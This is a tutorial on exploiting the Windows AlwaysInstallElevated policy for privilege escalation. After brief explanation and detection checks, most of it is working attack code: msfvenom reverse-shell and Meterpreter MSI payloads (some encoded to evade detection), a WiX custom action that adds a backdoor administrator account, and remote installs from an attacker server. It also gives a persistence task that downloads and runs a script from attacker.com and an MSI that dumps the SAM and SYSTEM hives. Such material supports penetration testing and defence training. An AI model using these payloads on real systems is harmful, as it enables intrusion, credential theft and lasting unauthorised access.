Exploiting AlwaysInstallElevated

Understanding AlwaysInstallElevated

What Is AlwaysInstallElevated?

AlwaysInstallElevated is like giving a valet key that automatically starts any car to anyone who wants to "install software." Normally, installing software requires administrative privileges and triggers UAC prompts. However, when AlwaysInstallElevated is enabled, any user can install MSI packages with SYSTEM privileges without any prompts.

This Windows Group Policy setting was designed for environments where standard users need to install approved software without administrator intervention. However, it creates a significant security risk because any MSI package will be installed with the highest system privileges.

How AlwaysInstallElevated Works

Normal MSI Installation Process:

1. User attempts to install MSI package

2. Windows checks user privileges

3. If not administrator, UAC prompt appears

4. User must provide admin credentials

5. Installation proceeds with elevated privileges

With AlwaysInstallElevated Enabled:

1. User attempts to install MSI package

2. Windows automatically elevates to SYSTEM privileges

3. No UAC prompt or credential check

4. Installation proceeds with SYSTEM privileges immediately

If AlwaysInstallElevated is enabled, the user context determines MSI execution; local execution by a standard user will elevate the MSI to SYSTEM

The Security Risk

When AlwaysInstallElevated is enabled, any user can:

• Install malicious MSI packages with SYSTEM privileges

• Bypass UAC completely for MSI installations

• Gain immediate administrative access to the system

• Execute any code during the installation process as SYSTEM

Registry Configuration

AlwaysInstallElevated requires specific registry settings to be enabled:

Required Registry Keys:

HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1

Why Both Keys Are Required:

• HKLM key - Enables the policy machine-wide

• HKCU key - Enables the policy for the current user

• Both must be set to 1 for the policy to take effect

This dual-key requirement was designed as a security measure, but in practice, both keys are often set when the policy is enabled via Group Policy.

Real-World Scenarios

Where AlwaysInstallElevated Is Commonly Found:

• Educational institutions - Allow students to install approved software

• Corporate environments - Let employees install business applications

• Kiosk systems - Enable automated software deployment

• Development environments - Allow developers to install tools

Why It's Dangerous: Even in controlled environments, this setting can be abused because:

• Any MSI file can be executed, not just approved ones

• Users can create malicious MSI packages

• Remote attackers can leverage this for privilege escalation

• No validation of MSI package contents occurs

---

Detection and Enumeration

Manual Registry Checks

Basic Registry Enumeration

Check if AlwaysInstallElevated is enabled:

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Understanding the output:

• Value 0x1 (1) - AlwaysInstallElevated is enabled

• Value 0x0 (0) - AlwaysInstallElevated is disabled

• Key not found - Policy is not configured (disabled by default)

PowerShell registry check:

function Test-AlwaysInstallElevated {
    try {
        # Check HKLM key
        $hklmValue = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
        
        # Check HKCU key  
        $hkcuValue = Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
        
        $hklmEnabled = $hklmValue.AlwaysInstallElevated -eq 1
        $hkcuEnabled = $hkcuValue.AlwaysInstallElevated -eq 1
        
        Write-Output "[+] AlwaysInstallElevated Check Results:"
        Write-Output "HKLM Setting: $(if($hklmEnabled){'Enabled'}else{'Disabled or Not Set'})"
        Write-Output "HKCU Setting: $(if($hkcuEnabled){'Enabled'}else{'Disabled or Not Set'})"
        
        if ($hklmEnabled -and $hkcuEnabled) {
            Write-Output "[!] VULNERABLE: AlwaysInstallElevated is enabled!"
            return $true
        } else {
            Write-Output "[-] Not vulnerable: AlwaysInstallElevated not configured"
            return $false
        }
        
    } catch {
        Write-Output "[-] Error checking AlwaysInstallElevated: $($_.Exception.Message)"
        return $false
    }
}

Test-AlwaysInstallElevated

Group Policy Verification

Check Group Policy settings:

# View current Group Policy for Windows Installer
gpresult /h gp_report.html
# Open gp_report.html and search for "AlwaysInstallElevated"

# Alternative command-line method
gpresult /r | findstr /i "installer"

PowerShell Group Policy check:

# Get Group Policy results for current user
$gpResult = gpresult /z 2>$null | Out-String

if ($gpResult -like "*AlwaysInstallElevated*") {
    Write-Output "[!] AlwaysInstallElevated found in Group Policy"
} else {
    Write-Output "[-] AlwaysInstallElevated not found in Group Policy"
}

Automated Detection Tools

PowerUp Detection

Using PowerUp framework:

Import-Module .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated

WinPEAS Detection

Using WinPEAS for detection:

winpeas.exe systeminfo | findstr /i "AlwaysInstallElevated"
winpeas.exe quiet | findstr /i "installer"

Metasploit Detection

Metasploit post-exploitation module:

# From meterpreter session
meterpreter > background
msf > use post/windows/gather/enum_applications
msf > set SESSION 1
msf > run

# Check for AlwaysInstallElevated specifically
msf > use post/multi/recon/local_exploit_suggester
msf > set SESSION 1
msf > run

---

Exploitation Techniques

Creating Malicious MSI Packages

Once AlwaysInstallElevated is confirmed, the next step is creating a malicious MSI package that will execute with SYSTEM privileges.

Method 1: Using MSFVenom

MSFVenom can generate malicious MSI packages directly:

Basic MSI payload generation:

# Generate reverse shell MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o malicious.msi

# Generate Meterpreter MSI
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o meterpreter.msi

# Generate command execution MSI
msfvenom -p windows/exec CMD="net user hacker Password123! /add && net localgroup administrators hacker /add" -f msi -o adduser.msi

Advanced MSI payload with evasion:

# Encoded payload to avoid detection
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -e x86/shikata_ga_nai -i 3 -o encoded.msi

# HTTPS Meterpreter for encrypted communication
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f msi -o https_shell.msi

Method 2: PowerShell MSI Creation

Creating MSI with PowerShell:

function New-MaliciousMSI {
    param(
        [string]$OutputPath = "C:\temp\malicious.msi",
        [string]$Command = "cmd.exe /c net user pwned Password123! /add"
    )
    
    # This is a simplified example - real MSI creation requires proper tools
    Write-Output "[+] Creating malicious MSI package..."
    Write-Output "Output: $OutputPath"
    Write-Output "Command: $Command"
    
    # In practice, you would use WiX Toolset or similar tools
    # This demonstrates the concept
    
    $msiContent = @"
[Setup]
AppName=System Update
AppVersion=1.0
DefaultDirName={pf}\SystemUpdate
OutputBaseFilename=malicious

[Files]
Source: "payload.exe"; DestDir: "{app}"

[Run]
Filename: "cmd.exe"; Parameters: "/c $Command"; Flags: runhidden
"@
    
    Write-Output "[!] MSI creation requires proper MSI authoring tools"
    Write-Output "[!] Use msfvenom or WiX Toolset for actual MSI generation"
}

Method 3: WiX Toolset MSI Creation

Using WiX Toolset for custom MSI:

<!-- malicious.wxs - WiX source file -->
<?xml version="1.0" encoding="UTF-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" Name="System Update" Language="1033" Version="1.0.0.0" 
           Manufacturer="Microsoft Corporation" UpgradeCode="12345678-1234-1234-1234-123456789012">
    
    <Package InstallerVersion="200" Compressed="yes" InstallScope="perMachine" />
    
    <Media Id="1" Cabinet="media1.cab" EmbedCab="yes" />
    
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="SystemUpdate" />
      </Directory>
    </Directory>
    
    <ComponentGroup Id="ProductComponents" Directory="INSTALLLOCATION">
      <Component Id="MainComponent" Guid="*">
        <File Id="PayloadFile" Source="payload.exe" KeyPath="yes" />
      </Component>
    </ComponentGroup>
    
    <Feature Id="ProductFeature" Title="System Update" Level="1">
      <ComponentGroupRef Id="ProductComponents" />
    </Feature>
    
    <!-- Custom action to execute payload -->
    <CustomAction Id="RunPayload" 
                  ExeCommand="cmd.exe /c net user hacker Password123! /add &amp;&amp; net localgroup administrators hacker /add"
                  Execute="deferred" 
                  Impersonate="no" />
    
    <InstallExecuteSequence>
      <Custom Action="RunPayload" After="InstallFiles">NOT Installed</Custom>
    </InstallExecuteSequence>
    
  </Product>
</Wix>

Compile WiX MSI:

# Compile the WiX source to MSI
candle.exe malicious.wxs
light.exe malicious.wixobj -o malicious.msi

MSI Installation and Execution

Manual Installation

Install MSI package:

# Standard installation
msiexec /i malicious.msi /quiet

# Silent installation (no UI)
msiexec /i malicious.msi /qn

# Installation with logging
msiexec /i malicious.msi /qn /l*v install.log

PowerShell MSI installation:

# Install MSI using PowerShell
Start-Process "msiexec.exe" -ArgumentList "/i malicious.msi /qn" -Wait

# Alternative method
$msiFile = "C:\temp\malicious.msi"
$arguments = "/i `"$msiFile`" /qn"
Start-Process "msiexec.exe" -ArgumentList $arguments -Wait -NoNewWindow

Write-Output "[+] MSI installation completed"

Remote MSI Installation

Install MSI from remote location:

# Install from UNC path
msiexec /i "\\attacker-server\share\malicious.msi" /qn

# Install from HTTP (if allowed)
msiexec /i "http://attacker-server/malicious.msi" /qn

PowerShell remote MSI:

# Download and install MSI
$msiUrl = "http://attacker-server/malicious.msi"
$localMsi = "$env:TEMP\update.msi"

try {
    Invoke-WebRequest -Uri $msiUrl -OutFile $localMsi
    Start-Process "msiexec.exe" -ArgumentList "/i `"$localMsi`" /qn" -Wait
    Remove-Item $localMsi -Force
    Write-Output "[+] Remote MSI installation completed"
} catch {
    Write-Error "Failed to install remote MSI: $($_.Exception.Message)"
}

Metasploit Integration

Metasploit AlwaysInstallElevated Module

Using Metasploit's built-in module:

# Use the AlwaysInstallElevated exploit
use exploit/windows/local/always_install_elevated

# Set session (from existing session)
set SESSION 1

# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4443

# Execute exploit
exploit

Manual Metasploit MSI Deployment

Generate and deploy MSI via Meterpreter:

# From meterpreter session
meterpreter > upload malicious.msi C:\\temp\\update.msi
meterpreter > shell

# Install MSI from shell
C:\> msiexec /i C:\temp\update.msi /qn

# Exit shell and check for new session
meterpreter > background
msf > sessions -l

Advanced Exploitation Techniques

Persistence via MSI

Create MSI for persistence:

# MSI that creates scheduled task for persistence
msfvenom -p windows/exec CMD="schtasks /create /tn 'SystemUpdate' /tr 'C:\Windows\System32\backdoor.exe' /sc onstart /ru SYSTEM /f" -f msi -o persistence.msi

PowerShell persistence MSI:

# Command to embed in MSI for persistence
$persistenceCommand = @"
schtasks /create /tn "WindowsOptimizer" /tr "powershell.exe -WindowStyle Hidden -Command 'IEX (New-Object Net.WebClient).DownloadString(\"http://attacker.com/payload.ps1\")'" /sc onlogon /ru SYSTEM /f
"@

# Use this command when creating MSI with msfvenom
# msfvenom -p windows/exec CMD="$persistenceCommand" -f msi -o persistence.msi

Credential Harvesting MSI

MSI for credential collection:

# MSI that dumps credentials
msfvenom -p windows/exec CMD="reg save HKLM\SAM C:\temp\sam.hiv && reg save HKLM\SECURITY C:\temp\security.hiv && reg save HKLM\SYSTEM C:\temp\system.hiv" -f msi -o dumpcreds.msi